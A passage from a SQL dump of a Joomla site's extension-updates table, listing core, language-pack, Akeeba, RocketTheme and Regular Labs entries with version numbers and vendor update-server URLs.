package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8428,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8429,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8430,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8431,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8432,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8433,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8434,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8435,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8436,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8437,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8438,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8439,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8440,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8441,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8442,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8443,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8444,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8445,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8446,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8447,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8448,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8449,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8450,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8451,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8452,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8453,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8454,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8455,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8456,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8457,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8458,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8459,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8460,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8461,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8462,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8463,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8464,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8465,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8466,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8467,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8468,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8469,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8470,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8471,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8472,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8473,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8474,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8475,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8476,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8477,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8478,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8479,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8480,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8481,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8482,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8483,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8484,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8485,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8486,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8487,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8488,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8489,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8490,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8491,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8492,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8493,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8494,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8495,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8496,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8497,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8498,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8499,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8500,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8501,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8502,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8503,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8504,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8505,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8506,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8507,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8508,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8509,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8510,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8511,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8512,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8513,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8514,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8515,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8516,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8517,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8518,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8519,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8520,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8521,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8522,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8523,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8524,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8525,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8526,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8527,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8528,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8529,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8530,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8531,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8532,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8533,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8534,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8535,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8536,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8537,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8538,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8539,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8540,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8541,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8542,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8543,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8544,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8545,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8546,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8547,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8548,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8549,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8550,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8551,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8552,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8553,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8554,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8555,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8556,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8557,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8558,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8559,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8560,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8561,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8562,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8563,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8564,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8565,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8566,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8567,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8568,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8569,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8570,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8571,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8572,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8573,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8574,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8575,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8576,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8577,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8578,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8579,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8580,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8581,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8582,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8583,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8584,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8585,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8586,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8587,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8588,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8589,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8590,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8591,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8592,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8593,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8594,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8595,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8596,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8597,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8598,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8599,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8600,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8601,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8602,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8603,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8604,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8605,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8606,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8607,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8608,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8609,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8610,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8611,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8612,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8613,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8614,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8615,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8616,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8617,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8618,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8619,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8620,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8621,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8622,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8623,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8624,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8625,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8626,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8627,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8628,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8629,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8630,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8631,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8632,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8633,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8634,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8635,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8636,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8637,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8638,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8639,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8640,101,0,'FOF 3.x Stable','FOF 3.x 